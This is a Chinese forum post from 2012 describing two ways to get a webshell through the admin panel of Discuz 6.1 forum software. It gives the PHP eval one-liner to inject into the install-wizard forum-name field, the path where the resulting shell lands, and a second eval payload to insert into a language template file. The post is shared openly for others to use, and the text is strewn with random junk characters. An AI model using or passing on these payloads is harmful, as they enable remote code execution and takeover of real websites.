discuz6.1两种方法后台拿shell0 q& q/ h v( h3 T
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
7 w1 u* F7 D" O. ]* Y4 w7 S; a) b1:- D$ A( k( }" T
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
3 K1 k. m& _- ~9 n) c5 r' o. xadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell! Z E3 n0 E9 n" }! F; p
<?php eval($_POST[cmd]);?>
- m6 }7 V3 b S9 `- D3 D: g后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
3 L" [& }8 Q0 g( i1 X5 `4 e
9 r. x _' y0 u; I; {5 ~
- f$ V1 I; r) e% T T2:后台模板管理--默认模板套系--详情2 Z3 ]- o! l) V& g: ?
templates/default/actions.lang.php
- M2 O: w( {2 C% M% U2 rjhackj\\');eval($_POST[cmd])?>;//
4 D: M3 Z7 _; Y- `7 [; R8 y5 {9 F4 j0 y4 |% G- S$ K% g4 p
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对